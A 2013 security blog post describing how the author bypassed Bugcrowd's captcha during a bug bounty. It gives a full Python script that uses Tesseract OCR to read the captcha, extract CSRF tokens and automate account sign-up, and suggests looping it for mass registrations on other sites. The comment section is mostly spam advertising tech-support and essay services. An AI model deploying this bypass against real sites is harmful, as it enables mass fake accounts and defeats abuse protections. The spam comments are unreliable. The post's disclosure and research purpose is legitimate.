Thursday, 5 December 2013

Breaking Bugcrowd's Captcha with Python and Tesseract

In this post I'm going to talk about bypassing Bugcrowd's captcha using Python and Tesseract. This post was originally written for the Bugcrowd blog here:

A Bugcrowd Bounty

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic captcha. In certain sections of the site, for example account sign up, password reset and on multiple failed passwords, you were required to enter the captcha to verify you were human:

This in theory would prevent the automated use of these functions. But if I could find a way to bypass the captcha I could potentially abuse these functions.

So how do you bypass a captcha? 

If it's a home-grown captcha you may be lucky enough to find a logic flaw such as the captcha code being included on the current page or perhaps you can re-use a valid captcha more than once.

If you're dealing with a more sophisticated captcha you've got two options. Either you outsource the work to a developing country ( or you can try optical character recognition (OCR).  


Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and have it return you a list of characters. I found Tesseract ( to be a good choice as it's engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd captcha was so simple all I needed to do was enlarge the image before submitting to Tesseract for analysis to succeed most of the time. For other more complex captchas that use distorted characters or overlays to mask the text you will need to clean the image before submitting to Tesseract. Some examples can be found in the references below.

Weaponizing using Python

With a way to obtain the captcha value from the captcha image I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy I am, I had a look on Google to see if someone else had already created a similar script and although there were captcha breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests, one to retrieve the sign-up page (containing captcha and csrf) and a second request to send sign-up data (username, email, password etc.) To automate the whole process the script would need to download a copy of the sign-up page, extract the csrf and captcha tokens, download and analyse the captcha then submit a sign-up request containing the following:

Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
# Created by @pwndizzle - 

from PIL import Image
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
        print("[+] Downloading Page");  
        site = urlopen("")
        site_html ="utf-8")
        global csrf
        #Parse page for CSRF token (string 43 characters long ending with =)  
        csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
        print ("-----CSRF Token: " + csrf[0])
        global ctoken
        #Parse page for captcha token (string 40 characters long)   
        ctoken = re.findall('[a-z0-9]{40}', site_html)
        print ("-----Captcha Token: " + ctoken[0])
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def getcaptcha():
        print("[+] Downloading Captcha"); 
        captchaurl = ""+ctoken[0] 
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def resizer():
 print("[+] Resizing...");
 im1 ="captcha1.png")
 width, height = im1.size
 im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)"captcha2.png")

def tesseract():
        print("[+] Running Tesseract...");
        #Run Tesseract, -psm 8, tells Tesseract we are looking for a single word['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
        f = open ("C:\Python33\output.txt","r")
        global cvalue
  #Remove whitespace and newlines from Tesseract output
        cvaluelines =" ", "").split('\n')
        cvalue = cvaluelines[0]
        print("-----Captcha: " + cvalue); 
    except Exception as e:
        print ("Error: " + str(e))

def send():
        print("[+] Sending request...");
        user = "testuser99"
        params = {'utf8':'%E2%9C%93', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'', 'user[password]':'password123', 'user[password_confirmation]':'password123', 'captcha':cvalue,'captcha_key':ctoken[0],'agree_terms_conditions':'true'}
        data = urlencode(params).encode('utf-8')
        request = Request("")
        #Send request and analyse response
        f = urlopen(request, data)
        response ='utf-8')
  #Check for error message
        fail ='The following errors occurred', response)
        if fail:
            print("-----Account creation failed!")
            print ("-----Account created!")
    except Exception as e:
        print ("Error: " + str(e))

print("[+] Start!");
#Download page and parse data
#Download captcha image
#Resize captcha image 
#Need more filtering? Add subroutines here!
#Use Tesseract to analyse captcha image
#Send request to site containing form data and captcha
print("[+] Finished!");

Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following captcha:

I get the following output:

Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

  •  Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.
  • Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha, means a lower success rate, more requests and a greater chance of getting caught/locked out.
  • There could be server-side mitigations in place we don't know about. E.g. Each ip cannot create more than five accounts a day.
  • The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.

Final Thoughts

I like the concept of captchas, current machines struggle with optical recognition and an image check is all it takes to prevent automation. As demonstrated though simple letter/number captchas can be easy to break and everyday use can frustrate users. For me images of people/objects/scenes, like the friend captcha used by Facebook, or interactive captchas/mini-games like those offered by appear to be an interesting alternative that offer effective anti-automation (for now) with improved user experience.  

If you want to re-use the script it should work fine on other machines and sites but you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha your targeting. I built the script using Python 3.3 and Tesseract 3.02 with default installation locations on Windows 7.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

Also cleaning catpchas with Imagemagick looked interesting but I didn't get round to testing it:

Thanks to Bugcrowd for all their awesome work. I hope you guys have found this post useful. Questions and feedback are always appreciated so drop me a comment below :)

Pwndizzle out.


  1. Hi, excelent post.
    But I don't understand how do you know the parameters like csrf authenticity_token and captcha_key, how can I obtain them
    Thank you

  2. - find step-wise step procedure for the setup of McAfee antivirus, installation and activation. Service Available 24/7 immediate McAfee customer support by expert technicians. For any issue or support to solution the Mcafee activate errors, dial McAfee toll-free phone number. – Purchase, download, install, and then activate Norton setup on

  3. we have no link or affiliation with any of the brand or third-party company as we independently offer support service for all the product errors you face while using the Office.

  4. - McAfee is an America-based overall programming association saw worldwide for offering world-class antivirus programming. McAfee offers a couple of features that can shield the system from online perils, including contaminations and malware. It not simply frustrates the diseases from entering the PC yet also ousts them completely.


  5. You're a talented blogger. I have joined your bolster and foresee searching for a more noteworthy measure of your amazing post. Also, I have shared your site in my casual networks!

  6. Being a Digital Marketer and Software Engineer by profession. My core interests include programming, troubleshooting and blogging. Check me out below:
    We've already written a few posts on how to fix these problems and easily install Office on your PC/Mac by simply clicking the below links:

  7. We write blogs about how to use Microsoft Office software, how to install it on different computers, and how to unlock it. Microsoft Office, as we all know, is a massive piece of software, and installing it can be difficult. We've already written a few posts on how to fix these problems and easily install Microsoft Office on your PC.

  8. | Activate Your Office Setup with Product Key login

  9. How to Get Microsoft Office works for Windows?
    Click Below Links:

  10. The Webroot program is highly rated software to protect your devices & data available for download at| ij.start.cannon/ts3322 |

  11. Enter Trend micro activation code on | www.trendmicro/activate to download and activate Trend Micro. To activate Trend micro, make sure you already have an activation code that you’ll probably enter on the site.


  12. Thanks for all the tips mentioned in this article!
    it’s always good to read things you have heard before
    and are implementing, but from a different perspective,
    always pick up some extra bits of information..Regarding
    transactional sms

  13. The office provides 1TB space in it. It also provides ad-free mails for you. With the help of the office, you can edit and create an idea of your own. It’s also known as a one-time purchase office so that you can purchase it only once and use it for life purposes.

  14. Hi....
    In this post, we will show you how to solve captcha code and bypass captchas using an OCR in Python.
    You are also read more Online Loan for Business Expansion

  15. Hi there I am so thrilled I found your website, I really found you by mistake, while I was browsing on google for something else, Anyhow I am here now and would just like to say thanks a lot for a tremendous post and a all round exciting blog (I also love the theme/design), I don’t have time to go through it all at the minute but I have saved it and also added in your RSS feeds, so when I have time I will be back to read more, Please do keep up the awesome job.
    office setup

  16. Thanks for sharing the valuable information. Such a nice blog you have shared here. For Cannabis Marketing Contact Cannabis Digital Marketing Agency.

  17. The prospect of writing their first scientific research article may be both exciting and overwhelming for first-time authors. When confronted with a mountain of data, notes, and other research remnants, it can be challenging to determine where and how to begin the manuscript writing process. However, the option for research paper writers is always open for learners. If the research is thorough and the topic is appropriate for classroom submission or journal publication, authors can get a head start on the writing process by following a systematic approach.
    It is always good to know what research writing is all about before you start it. All scientific writing should be clear, simple, and correct. It's important for people who write research articles to keep these things in mind. People who need university assignment help have a hard time understanding them, so these should be their touchstones or benchmarks. So, they should focus on the following elements:
    Achieving clarity: It is achieved through the following:
    Proper sentence structuring: Shorter paragraphs and sentences make it easier for the reader to understand what the text is about. There is a way to write simple, informative sentences that don't sound choppy or unprofessional, even if they are short. Hire an expert offering academic writing services in case of any doubts or queries.
    Correct vocabulary and grammar usage: Proper language and grammar use can help improve the flow of the manuscript and make it more enjoyable for the readers. This stops a reader from being biased against the author.
    Time management: Writing manuscripts takes a lot of time. For people who are writing their first research paper, it will be important to set aside time each day to work on specific parts of the article. In the words for buy dissertation online experts, it’s advisable to make a schedule and stick to it.
    Editing: In fact, scientific research and writing a manuscript are going to be very complicated and detailed. Each part of the research paper will need to be re-read and changed. It is likely that the writer will get tired of their paper before it is ready for a journal. It's good to ask your friends to look for dissertation writing help and give their thoughts and suggestions for changes.
    We have a few more services: 112051 Assessment Answers| 11218 Task Answers| 112192 Assignment Answers| 112211 Answers| 11222 Solutions